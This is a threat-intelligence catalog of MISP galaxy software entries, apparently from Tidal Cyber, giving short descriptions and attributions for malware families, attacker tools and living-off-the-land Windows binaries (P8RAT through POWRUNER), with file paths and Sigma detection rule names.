[P8RAT](https://app.tidalcyber.com/software/1933ad3d-3085-4b1b-82b9-ac51b440e2bf) is a fileless malware used by [menuPass](https://app.tidalcyber.com/groups/fb93231d-2ae4-45da-9dea-4c372a11f322) to download and execute payloads since at least 2020.<sup>[[Securelist APT10 March 2021](https://app.tidalcyber.com/references/90450a1e-59c3-491f-b842-2cf81023fc9e)]</sup>

The tag is: misp-galaxy:software="P8RAT"

Pacu

Pacu is an open-source AWS exploitation framework. The tool is written in Python and publicly available on GitHub.<sup>[[GitHub Pacu](https://app.tidalcyber.com/references/bda43b1b-ea8d-4371-9984-6d8a7cc24965)]</sup>

The tag is: misp-galaxy:software="Pacu"

Pandora

[Pandora](https://app.tidalcyber.com/software/320b0784-4f0f-46ea-99e9-c34bfcca1c2e) is a multistage kernel rootkit with backdoor functionality that has been in use by [Threat Group-3390](https://app.tidalcyber.com/groups/79be2f31-5626-425e-844c-fd9c99e38fe5) since at least 2020.<sup>[[Trend Micro Iron Tiger April 2021](https://app.tidalcyber.com/references/d0890d4f-e7ca-4280-a54e-d147f6dd72aa)]</sup>

The tag is: misp-galaxy:software="Pandora"

Pasam

The tag is: misp-galaxy:software="Pasam"

Pass-The-Hash Toolkit

[Pass-The-Hash Toolkit](https://app.tidalcyber.com/software/8d007d52-8898-494c-8d72-354abd93da1e) is a toolkit that allows an adversary to "pass" a password hash (without knowing the original password) to log in to systems. <sup>[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]</sup>

The tag is: misp-galaxy:software="Pass-The-Hash Toolkit"

PasswordFox

PasswordFox is a tool used to recover passwords from Firefox web browser.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="PasswordFox"

Fobushell - Associated Software

<sup>[[NCCIC AR-17-20045 February 2017](https://app.tidalcyber.com/references/b930e838-649b-42ab-86dc-0443667276de)]</sup>

The tag is: misp-galaxy:software="Fobushell - Associated Software"

P.A.S. Webshell

[P.A.S. Webshell](https://app.tidalcyber.com/software/4d79530c-2fd9-4438-a8da-74f42119695a) is a publicly available multifunctional PHP webshell in use since at least 2016 that provides remote access and execution on target web servers.<sup>[[ANSSI Sandworm January 2021](https://app.tidalcyber.com/references/5e619fef-180a-46d4-8bf5-998860b5ad7e)]</sup>

The tag is: misp-galaxy:software="P.A.S. Webshell"

Pay2Key

[Pay2Key](https://app.tidalcyber.com/software/9aa21e50-726e-4002-8b7b-75697a03eb2b) is a ransomware written in C++ that has been used by [Fox Kitten](https://app.tidalcyber.com/groups/7094468a-2310-48b5-ad24-e669152bd66d) since at least July 2020 including campaigns against Israeli companies. [Pay2Key](https://app.tidalcyber.com/software/9aa21e50-726e-4002-8b7b-75697a03eb2b) has been incorporated with a leak site to display stolen sensitive information to further pressure victims into payment.<sup>[[ClearkSky Fox Kitten February 2020](https://app.tidalcyber.com/references/a5ad6321-897a-4adc-9cdd-034a2538e3d6)]</sup><sup>[[Check Point Pay2Key November 2020](https://app.tidalcyber.com/references/e4ea263d-f70e-4f9c-92a1-cb0e565a5ae9)]</sup>

The tag is: misp-galaxy:software="Pay2Key"

Pcalua.exe - Associated Software

<sup>[[Pcalua.exe - LOLBAS Project](/references/958064d4-7f9f-46a9-b475-93d6587ed770)]</sup>

The tag is: misp-galaxy:software="Pcalua.exe - Associated Software"

Pcalua

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Program Compatibility Assistant

Author: Oddvar Moe

Paths: * C:\Windows\System32\pcalua.exe

Detection:

* Sigma: proc_creation_win_lolbin_pcalua.yml<sup>[[Pcalua.exe - LOLBAS Project](/references/958064d4-7f9f-46a9-b475-93d6587ed770)]</sup>

The tag is: misp-galaxy:software="Pcalua"

PCHunter

PCHunter is a tool used to enable advanced task management, including for system processes and kernels.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="PCHunter"

PcShare

[PcShare](https://app.tidalcyber.com/software/71eb2211-39aa-4b89-bd51-9dcabd363149) is an open source remote access tool that has been modified and used by Chinese threat actors, most notably during the FunnyDream campaign since late 2018.<sup>[[Bitdefender FunnyDream Campaign November 2020](https://app.tidalcyber.com/references/b62a9f2c-02ca-4dfa-95fc-5dc6ad9568de)]</sup><sup>[[GitHub PcShare 2014](https://app.tidalcyber.com/references/f113559f-a6da-43bc-bc64-9ff7155b82bc)]</sup>

The tag is: misp-galaxy:software="PcShare"

Pcwrun.exe - Associated Software

<sup>[[Pcwrun.exe - LOLBAS Project](/references/b5946ca4-1f1b-4cba-af2f-0b99d6fff8b0)]</sup>

The tag is: misp-galaxy:software="Pcwrun.exe - Associated Software"

Pcwrun

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Program Compatibility Wizard

Author: Oddvar Moe

Paths: * C:\Windows\System32\pcwrun.exe

Detection:

* Sigma: proc_creation_win_lolbin_pcwrun_follina.yml<sup>[[Pcwrun.exe - LOLBAS Project](/references/b5946ca4-1f1b-4cba-af2f-0b99d6fff8b0)]</sup>

The tag is: misp-galaxy:software="Pcwrun"

Pcwutl.dll - Associated Software

<sup>[[Pcwutl.dll - LOLBAS Project](/references/1050758d-20da-4c4a-83d3-40aeff3db9ca)]</sup>

The tag is: misp-galaxy:software="Pcwutl.dll - Associated Software"

Pcwutl

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Microsoft HTML Viewer

Author: LOLBAS Team

Paths:

* c:\windows\system32\pcwutl.dll
* c:\windows\syswow64\pcwutl.dll

Detection:

* Analysis: [https://redcanary.com/threat-detection-report/techniques/rundll32/](https://redcanary.com/threat-detection-report/techniques/rundll32/)
* Sigma: proc_creation_win_rundll32_susp_activity.yml<sup>[[Pcwutl.dll - LOLBAS Project](/references/1050758d-20da-4c4a-83d3-40aeff3db9ca)]</sup>

The tag is: misp-galaxy:software="Pcwutl"

Peirates

[Peirates](https://app.tidalcyber.com/software/52a19c73-2454-4893-8f84-8d05c37a9472) is a post-exploitation Kubernetes exploitation framework with a focus on gathering service account tokens for lateral movement and privilege escalation. The tool is written in GoLang and publicly available on GitHub.<sup>[[Peirates GitHub](https://app.tidalcyber.com/references/a75cde8b-76e4-4dc3-b1d5-cf08479905e7)]</sup>

The tag is: misp-galaxy:software="Peirates"

Penquin 2.0 - Associated Software

<sup>[[Leonardo Turla Penquin May 2020](https://app.tidalcyber.com/references/09d8bb54-6fa5-4842-98aa-6e9656a19092)]</sup>

The tag is: misp-galaxy:software="Penquin 2.0 - Associated Software"

Penquin_x64 - Associated Software

<sup>[[Leonardo Turla Penquin May 2020](https://app.tidalcyber.com/references/09d8bb54-6fa5-4842-98aa-6e9656a19092)]</sup>

The tag is: misp-galaxy:software="Penquin_x64 - Associated Software"

Penquin

[Penquin](https://app.tidalcyber.com/software/951fad62-f636-4c01-b924-bb0ce87f5b20) is a remote access trojan (RAT) with multiple versions used by [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2) to target Linux systems since at least 2014.<sup>[[Kaspersky Turla Penquin December 2014](https://app.tidalcyber.com/references/957edb5c-b893-4968-9603-1a6b8577f3aa)]</sup><sup>[[Leonardo Turla Penquin May 2020](https://app.tidalcyber.com/references/09d8bb54-6fa5-4842-98aa-6e9656a19092)]</sup>

The tag is: misp-galaxy:software="Penquin"

Peppy

The tag is: misp-galaxy:software="Peppy"

Pester.bat - Associated Software

<sup>[[Pester.bat - LOLBAS Project](/references/93f281f6-6fcc-474a-b222-b303ea417a18)]</sup>

The tag is: misp-galaxy:software="Pester.bat - Associated Software"

Pester

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used as part of PowerShell Pester

Author: Oddvar Moe

Paths:

* c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat
* c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat

Resources:

* [https://twitter.com/Oddvarmoe/status/993383596244258816](https://twitter.com/Oddvarmoe/status/993383596244258816)
* [https://twitter.com/st0pp3r/status/1560072680887525378](https://twitter.com/st0pp3r/status/1560072680887525378)

Detection:

* Sigma: proc_creation_win_lolbin_pester_1.yml<sup>[[Pester.bat - LOLBAS Project](/references/93f281f6-6fcc-474a-b222-b303ea417a18)]</sup>

The tag is: misp-galaxy:software="Pester"

Pikabot

Pikabot is a malware first observed in early 2023 that has downloader/dropper and backdoor functionality. Researchers observed Pikabot distribution increase following the disruption of the QakBot botnet by authorities in August 2023. Originally distributed via spam email campaigns, researchers observed the threat actor TA577 (previously known for distributing payloads including QakBot, IcedID, SystemBC, and Cobalt Strike) distributing Pikabot starting in December 2023.<sup>[[Malwarebytes Pikabot December 15 2023](/references/50b29ef4-7ade-4672-99b6-fdf367170a5b)]</sup>

The tag is: misp-galaxy:software="Pikabot"

Pillowmint

[Pillowmint](https://app.tidalcyber.com/software/db5d718b-1344-4aa2-8e6a-54e68d8adfb1) is a point-of-sale malware used by [FIN7](https://app.tidalcyber.com/groups/4348c510-50fc-4448-ab8d-c8cededd19ff) designed to capture credit card information.<sup>[[Trustwave Pillowmint June 2020](https://app.tidalcyber.com/references/31bf381d-a0fc-4a4f-8d39-832480891685)]</sup>

The tag is: misp-galaxy:software="Pillowmint"

PinchDuke

The tag is: misp-galaxy:software="PinchDuke"

Ping

[Ping](https://app.tidalcyber.com/software/4ea12106-c0a1-4546-bb64-a1675d9f5dc7) is an operating system utility commonly used to troubleshoot and verify network connections. <sup>[[TechNet Ping](https://app.tidalcyber.com/references/5afc8ad5-f50d-464f-ba84-e347b3f3e994)]</sup>

The tag is: misp-galaxy:software="Ping"

PingCastle

PingCastle is a tool that can be used to enumerate Active Directory and map trust relationships. BianLian Ransomware Group actors have used the tool for discovery purposes during attacks.<sup>[[U.S. CISA BianLian Ransomware May 2023](/references/aa52e826-f292-41f6-985d-0282230c8948)]</sup>

The tag is: misp-galaxy:software="PingCastle"

PingPull

[PingPull](https://app.tidalcyber.com/software/4360cc62-7263-48b2-bd2a-a7737563545c) is a remote access Trojan (RAT) written in Visual C++ that has been used by [GALLIUM](https://app.tidalcyber.com/groups/15ff1ce0-44f0-4f1d-a4ef-83444570e572) since at least June 2022. [PingPull](https://app.tidalcyber.com/software/4360cc62-7263-48b2-bd2a-a7737563545c) has been used to target telecommunications companies, financial institutions, and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam.<sup>[[Unit 42 PingPull Jun 2022](https://app.tidalcyber.com/references/ac6491ab-6ef1-4091-8a15-50e2cbafe157)]</sup>

The tag is: misp-galaxy:software="PingPull"

PipeMon

The tag is: misp-galaxy:software="PipeMon"

Pisloader

[Pisloader](https://app.tidalcyber.com/software/14e65c5d-5164-41a3-92de-67fdd1d529d2) is a malware family that is notable due to its use of DNS as a C2 protocol as well as its use of anti-analysis tactics. It has been used by [APT18](https://app.tidalcyber.com/groups/a0c31021-b281-4c41-9855-436768299fe7) and is similar to another malware family, [HTTPBrowser](https://app.tidalcyber.com/software/c4fe23f7-f18c-40f6-b431-0b104b497eaa), that has been used by the group. <sup>[[Palo Alto DNS Requests](https://app.tidalcyber.com/references/4a946c3f-ee0a-4649-8104-2bd9d90ebd49)]</sup>

The tag is: misp-galaxy:software="Pisloader"

Pktmon.exe - Associated Software

<sup>[[Pktmon.exe - LOLBAS Project](/references/8f0ad4ed-869b-4332-b091-7551262cff29)]</sup>

The tag is: misp-galaxy:software="Pktmon.exe - Associated Software"

Pktmon

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Captures network packets on Windows 10 with the October 2018 Update or later.

Author: Derek Johnson

Paths:

* c:\windows\system32\pktmon.exe
* c:\windows\syswow64\pktmon.exe

Detection:

* Sigma: [proc_creation_win_lolbin_pktmon.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_pktmon.yml)
* IOC: .etl files found on system<sup>[[Pktmon.exe - LOLBAS Project](/references/8f0ad4ed-869b-4332-b091-7551262cff29)]</sup>

The tag is: misp-galaxy:software="Pktmon"

PLAINTEE

[PLAINTEE](https://app.tidalcyber.com/software/9445f18a-a796-447a-a35f-94a9fb72411c) is a malware sample that has been used by [Rancor](https://app.tidalcyber.com/groups/021b3c71-6467-4e46-a413-8b726f066f2c) in targeted attacks in Singapore and Cambodia. <sup>[[Rancor Unit42 June 2018](https://app.tidalcyber.com/references/45098a85-a61f-491a-a549-f62b02dc2ecd)]</sup>

The tag is: misp-galaxy:software="PLAINTEE"

PLEAD

[PLEAD](https://app.tidalcyber.com/software/9a890a85-afbe-4c35-a3e7-1adad481bdf7) is a remote access tool (RAT) and downloader used by [BlackTech](https://app.tidalcyber.com/groups/528ab2ea-b8f1-44d8-8831-2a89fefd97cb) in targeted attacks in East Asia including Taiwan, Japan, and Hong Kong.<sup>[[TrendMicro BlackTech June 2017](https://app.tidalcyber.com/references/abb9cb19-d30e-4048-b106-eb29a6dad7fc)]</sup><sup>[[JPCert PLEAD Downloader June 2018](https://app.tidalcyber.com/references/871f4af2-ed99-4256-a74d-b8c0816a82ab)]</sup> [PLEAD](https://app.tidalcyber.com/software/9a890a85-afbe-4c35-a3e7-1adad481bdf7) has also been referred to as [TSCookie](https://app.tidalcyber.com/software/9872ab5a-c76e-4404-91f9-5b745722443b), though more recent reporting indicates likely separation between the two. [PLEAD](https://app.tidalcyber.com/software/9a890a85-afbe-4c35-a3e7-1adad481bdf7) was observed in use as early as March 2017.<sup>[[JPCert TSCookie March 2018](https://app.tidalcyber.com/references/ff1717f7-0d2e-4947-87d7-44576affe9f8)]</sup><sup>[[JPCert PLEAD Downloader June 2018](https://app.tidalcyber.com/references/871f4af2-ed99-4256-a74d-b8c0816a82ab)]</sup>

The tag is: misp-galaxy:software="PLEAD"

PuTTY Link - Associated Software

The tag is: misp-galaxy:software="PuTTY Link - Associated Software"

Plink

Plink is a tool used to automate Secure Shell (SSH) actions on Windows.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="Plink"

DestroyRAT - Associated Software

The tag is: misp-galaxy:software="DestroyRAT - Associated Software"

Sogu - Associated Software

The tag is: misp-galaxy:software="Sogu - Associated Software"

Thoper - Associated Software

The tag is: misp-galaxy:software="Thoper - Associated Software"

TVT - Associated Software

The tag is: misp-galaxy:software="TVT - Associated Software"

Kaba - Associated Software

The tag is: misp-galaxy:software="Kaba - Associated Software"

Korplug - Associated Software

The tag is: misp-galaxy:software="Korplug - Associated Software"

PlugX

[PlugX](https://app.tidalcyber.com/software/070b56f4-7810-4dad-b85f-bdfce9c08c10) is a remote access tool (RAT) with modular plugins that has been used by multiple threat groups.<sup>[[Lastline PlugX Analysis](https://app.tidalcyber.com/references/9f7fa262-cede-4f47-94ca-1534c65c86e2)]</sup><sup>[[FireEye Clandestine Fox Part 2](https://app.tidalcyber.com/references/82500741-984d-4039-8f53-b303845c2849)]</sup><sup>[[New DragonOK](https://app.tidalcyber.com/references/82c1ed0d-a41d-4212-a3ae-a1d661bede2d)]</sup><sup>[[Dell TG-3390](https://app.tidalcyber.com/references/dfd2d832-a6c5-40e7-a554-5a92f05bebae)]</sup>

The tag is: misp-galaxy:software="PlugX"

pngdowner

[pngdowner](https://app.tidalcyber.com/software/95c273d2-3081-4cb5-8d41-37eb4e90264d) is malware used by [Putter Panda](https://app.tidalcyber.com/groups/6005f4a9-fe26-4237-a44e-3f6cbb1fe75c). It is a simple tool with limited functionality and no persistence mechanism, suggesting it is used only as a simple "download-and-execute" utility. <sup>[[CrowdStrike Putter Panda](https://app.tidalcyber.com/references/413962d0-bd66-4000-a077-38c2677995d1)]</sup>

The tag is: misp-galaxy:software="pngdowner"

Pnputil.exe - Associated Software

<sup>[[Pnputil.exe - LOLBAS Project](/references/21d0419a-5454-4808-b7e6-2b1b9de08ed6)]</sup>

The tag is: misp-galaxy:software="Pnputil.exe - Associated Software"

Pnputil

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used for installing drivers

Author: Hai vaknin (lux)

Paths: * C:\Windows\system32\pnputil.exe

Resources: None Provided

Detection:

* Sigma: proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml<sup>[[Pnputil.exe - LOLBAS Project](/references/21d0419a-5454-4808-b7e6-2b1b9de08ed6)]</sup>

The tag is: misp-galaxy:software="Pnputil"

PoetRAT

[PoetRAT](https://app.tidalcyber.com/software/79b4f277-3b18-4aa7-9f96-44b35b23166b) is a remote access trojan (RAT) that was first identified in April 2020. [PoetRAT](https://app.tidalcyber.com/software/79b4f277-3b18-4aa7-9f96-44b35b23166b) has been used in multiple campaigns against the private and public sectors in Azerbaijan, including ICS and SCADA systems in the energy sector. The STIBNITE activity group has been observed using the malware. [PoetRAT](https://app.tidalcyber.com/software/79b4f277-3b18-4aa7-9f96-44b35b23166b) derived its name from references in the code to poet William Shakespeare. <sup>[[Talos PoetRAT April 2020](https://app.tidalcyber.com/references/fe2a79a5-bc50-4147-b919-f3d0eb7430b6)]</sup><sup>[[Talos PoetRAT October 2020](https://app.tidalcyber.com/references/5862c90a-3bae-48d0-8749-9a6510fe3630)]</sup><sup>[[Dragos Threat Report 2020](https://app.tidalcyber.com/references/8bb3147c-3178-4449-9978-f1248b1bcb0a)]</sup>

The tag is: misp-galaxy:software="PoetRAT"

Breut - Associated Software

The tag is: misp-galaxy:software="Breut - Associated Software"

Poison Ivy - Associated Software

The tag is: misp-galaxy:software="Poison Ivy - Associated Software"

Darkmoon - Associated Software

The tag is: misp-galaxy:software="Darkmoon - Associated Software"

PoisonIvy

[PoisonIvy](https://app.tidalcyber.com/software/1d87a695-7989-49ae-ac1a-b6601db565c3) is a popular remote access tool (RAT) that has been used by many groups.<sup>[[FireEye Poison Ivy](https://app.tidalcyber.com/references/c189447e-a903-4dc2-a38b-1f4accc64e20)]</sup><sup>[[Symantec Elderwood Sept 2012](https://app.tidalcyber.com/references/5e908748-d260-42f1-a599-ac38b4e22559)]</sup><sup>[[Symantec Darkmoon Aug 2005](https://app.tidalcyber.com/references/7088234d-a6fc-49ad-b4fd-2fe8ca333c1d)]</sup>

The tag is: misp-galaxy:software="PoisonIvy"

Pony

[Pony](https://app.tidalcyber.com/software/555b612e-3f0d-421d-b2a7-63eb2d1ece5f) is a credential stealing malware, though has also been used among adversaries for its downloader capabilities. The source code for Pony Loader 1.0 and 2.0 were leaked online, leading to their use by various threat actors.<sup>[[Malwarebytes Pony April 2016](https://app.tidalcyber.com/references/f8700002-5da6-4cb8-be62-34e421d2a573)]</sup>

The tag is: misp-galaxy:software="Pony"

POORAIM

The tag is: misp-galaxy:software="POORAIM"

PoshC2

[PoshC2](https://app.tidalcyber.com/software/a3a03835-79bf-4558-8e80-7983aeb842fb) is an open source remote administration and post-exploitation framework that is publicly available on GitHub. The server-side components of the tool are primarily written in Python, while the implants are written in [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde). Although [PoshC2](https://app.tidalcyber.com/software/a3a03835-79bf-4558-8e80-7983aeb842fb) is primarily focused on Windows implantation, it does contain a basic Python dropper for Linux/macOS.<sup>[[GitHub PoshC2](https://app.tidalcyber.com/references/45e79c0e-a2f6-4b56-b621-4142756bd1b1)]</sup>

The tag is: misp-galaxy:software="PoshC2"

POSHSPY

[POSHSPY](https://app.tidalcyber.com/software/b92f28c4-cbc8-4721-ac79-2d8bdf5247e5) is a backdoor that has been used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) since at least 2015. It appears to be used as a secondary backdoor used if the actors lost access to their primary backdoors. <sup>[[FireEye POSHSPY April 2017](https://app.tidalcyber.com/references/b1271e05-80d7-4761-a13f-b6f0db7d7e5a)]</sup>

The tag is: misp-galaxy:software="POSHSPY"

PowerDuke

[PowerDuke](https://app.tidalcyber.com/software/d9e4f4a1-dd41-424e-986a-b9a39ebea805) is a backdoor that was used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) in 2016. It has primarily been delivered through Microsoft Word or Excel attachments containing malicious macros. <sup>[[Volexity PowerDuke November 2016](https://app.tidalcyber.com/references/4026c055-6020-41bb-a4c8-54b308867023)]</sup>

The tag is: misp-galaxy:software="PowerDuke"

PowerLess

[PowerLess](https://app.tidalcyber.com/software/8b9159c1-db48-472b-9897-34325da5dca7) is a PowerShell-based modular backdoor that has been used by [Magic Hound](https://app.tidalcyber.com/groups/7a9d653c-8812-4b96-81d1-b0a27ca918b4) since at least 2022.<sup>[[Cybereason PowerLess February 2022](https://app.tidalcyber.com/references/095aaa25-b674-4313-bc4f-3227b00c0459)]</sup>

The tag is: misp-galaxy:software="PowerLess"

Power Loader

[Power Loader](https://app.tidalcyber.com/software/018ee1d9-35af-49dc-a667-11b77cd76f46) is modular code sold in the cybercrime market used as a downloader in malware families such as Carberp, Redyms and Gapz. <sup>[[MalwareTech Power Loader Aug 2013](https://app.tidalcyber.com/references/9a9a6ca1-d7c5-4385-924b-cdeffd66602e)]</sup> <sup>[[WeLiveSecurity Gapz and Redyms Mar 2013](https://app.tidalcyber.com/references/b8d328b7-2eb3-4851-8d44-2e1bad7710c2)]</sup>

The tag is: misp-galaxy:software="Power Loader"

Powerpnt.exe - Associated Software

<sup>[[Powerpnt.exe - LOLBAS Project](/references/23c48ab3-9426-4949-9a35-d1b9ecb4bb47)]</sup>

The tag is: misp-galaxy:software="Powerpnt.exe - Associated Software"

Powerpnt

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Microsoft Office binary.

Author: Reegun J (OCBC Bank)

Paths: * C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Powerpnt.exe * C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Powerpnt.exe * C:\Program Files (x86)\Microsoft Office\Office16\Powerpnt.exe * C:\Program Files\Microsoft Office\Office16\Powerpnt.exe * C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Powerpnt.exe * C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Powerpnt.exe * C:\Program Files (x86)\Microsoft Office\Office15\Powerpnt.exe * C:\Program Files\Microsoft Office\Office15\Powerpnt.exe * C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Powerpnt.exe * C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Powerpnt.exe * C:\Program Files (x86)\Microsoft Office\Office14\Powerpnt.exe * C:\Program Files\Microsoft Office\Office14\Powerpnt.exe * C:\Program Files (x86)\Microsoft Office\Office12\Powerpnt.exe * C:\Program Files\Microsoft Office\Office12\Powerpnt.exe

Detection: * Sigma: [proc_creation_win_lolbin_office.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_office.yml) * IOC: Suspicious Office application Internet/network traffic<sup>[[Powerpnt.exe - LOLBAS Project](/references/23c48ab3-9426-4949-9a35-d1b9ecb4bb47)]</sup>

The tag is: misp-galaxy:software="Powerpnt"

PowerPunch

[PowerPunch](https://app.tidalcyber.com/software/e7cdaf70-5e28-442a-b34d-894484788dc5) is a lightweight downloader that has been used by [Gamaredon Group](https://app.tidalcyber.com/groups/41e8b4a4-2d31-46ee-bc56-12375084d067) since at least 2021.<sup>[[Microsoft Actinium February 2022](https://app.tidalcyber.com/references/5ab658db-7f71-4213-8146-e22da54160b3)]</sup>

The tag is: misp-galaxy:software="PowerPunch"

PowerShower

[PowerShower](https://app.tidalcyber.com/software/2ca245de-77a9-4857-ba93-fd0d6988df9d) is a PowerShell backdoor used by [Inception](https://app.tidalcyber.com/groups/d7c58e7f-f0b0-44c6-b205-5adcfb56f0e6) for initial reconnaissance and to download and execute second stage payloads.<sup>[[Unit 42 Inception November 2018](https://app.tidalcyber.com/references/5cb98fce-f386-4878-b69c-5c6440ad689c)]</sup><sup>[[Kaspersky Cloud Atlas August 2019](https://app.tidalcyber.com/references/4c3ae600-0787-4847-b528-ae3e8ff1b5ef)]</sup>

The tag is: misp-galaxy:software="PowerShower"

DNSMessenger - Associated Software

Based on similar descriptions of functionality, it appears that POWERSOURCE (ATT&CK S0145), as named by FireEye, is the same as the first stage of a backdoor that Cisco's Talos Intelligence Group calls DNSMessenger. FireEye, however, appears to split DNSMessenger into two parts, S0145 and S0146. <sup>[[Cisco DNSMessenger March 2017](https://app.tidalcyber.com/references/49f22ba2-5aca-4204-858e-c2499a7050ae)]</sup> <sup>[[FireEye FIN7 March 2017](https://app.tidalcyber.com/references/7987bb91-ec41-42f8-bd2d-dabc26509a08)]</sup>

The tag is: misp-galaxy:software="DNSMessenger - Associated Software"

POWERSOURCE

[POWERSOURCE](https://app.tidalcyber.com/software/a4700431-6578-489f-9782-52e394277296) is a PowerShell backdoor that is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. It was observed in February 2017 in spearphishing campaigns against personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations. The malware was delivered when macros were enabled by the victim and a VBS script was dropped. <sup>[[FireEye FIN7 March 2017](https://app.tidalcyber.com/references/7987bb91-ec41-42f8-bd2d-dabc26509a08)]</sup> <sup>[[Cisco DNSMessenger March 2017](https://app.tidalcyber.com/references/49f22ba2-5aca-4204-858e-c2499a7050ae)]</sup>

The tag is: misp-galaxy:software="POWERSOURCE"

PowerSploit

[PowerSploit](https://app.tidalcyber.com/software/82fad10d-c921-4a87-a533-49def83d002b) is an open source, offensive security framework comprised of [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) modules and scripts that perform a wide range of tasks related to penetration testing such as code execution, persistence, bypassing anti-virus, recon, and exfiltration. <sup>[[GitHub PowerSploit May 2012](https://app.tidalcyber.com/references/ec3edb54-9f1b-401d-a265-cd8924e5cb2b)]</sup> <sup>[[PowerShellMagazine PowerSploit July 2014](https://app.tidalcyber.com/references/7765d4f7-bf2d-43b9-a87e-74114a092645)]</sup> <sup>[[PowerSploit Documentation](https://app.tidalcyber.com/references/56628e55-94cd-4c5e-8f5a-34ffb7a45174)]</sup>

The tag is: misp-galaxy:software="PowerSploit"

PowerStallion

The tag is: misp-galaxy:software="PowerStallion"

Powermud - Associated Software

The tag is: misp-galaxy:software="Powermud - Associated Software"

POWERSTATS

The tag is: misp-galaxy:software="POWERSTATS"

POWERTON

[POWERTON](https://app.tidalcyber.com/software/b3c28750-3825-4e4d-ab92-f39a6b0827dd) is a custom PowerShell backdoor first observed in 2018. It has typically been deployed as a late-stage backdoor by [APT33](https://app.tidalcyber.com/groups/99bbbe25-45af-492f-a7ff-7cbc57828bac). At least two variants of the backdoor have been identified, with the later version containing improved functionality.<sup>[[FireEye APT33 Guardrail](https://app.tidalcyber.com/references/4b4c9e72-eee1-4fa4-8dcb-501ec49882b0)]</sup>

The tag is: misp-galaxy:software="POWERTON"

PowerTool

PowerTool is a tool used to remove rootkits, as well as to detect, analyze, and fix kernel structure modifications.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="PowerTool"

PowGoop

[PowGoop](https://app.tidalcyber.com/software/7ed984bb-d098-4d0a-90fd-b03e68842479) is a loader that consists of a DLL loader and a PowerShell-based downloader; it has been used by [MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6) as their main loader.<sup>[[DHS CISA AA22-055A MuddyWater February 2022](https://app.tidalcyber.com/references/e76570e1-43ab-4819-80bc-895ede67a205)]</sup><sup>[[CYBERCOM Iranian Intel Cyber January 2022](https://app.tidalcyber.com/references/671e1559-c7dc-4cb4-a9a1-21776f2ae56a)]</sup>

The tag is: misp-galaxy:software="PowGoop"

POWRUNER

[POWRUNER](https://app.tidalcyber.com/software/67cdb7a6-5142-43fa-8b8d-d9bdd2a4dae4) is a PowerShell script that sends and receives commands to and from the C2 server. <sup>[[FireEye APT34 Dec 2017](https://app.tidalcyber.com/references/88f41728-08ad-4cd8-a418-895738d68b04)]</sup>

The tag is: misp-galaxy:software="POWRUNER"

Presentationhost.exe - Associated Software

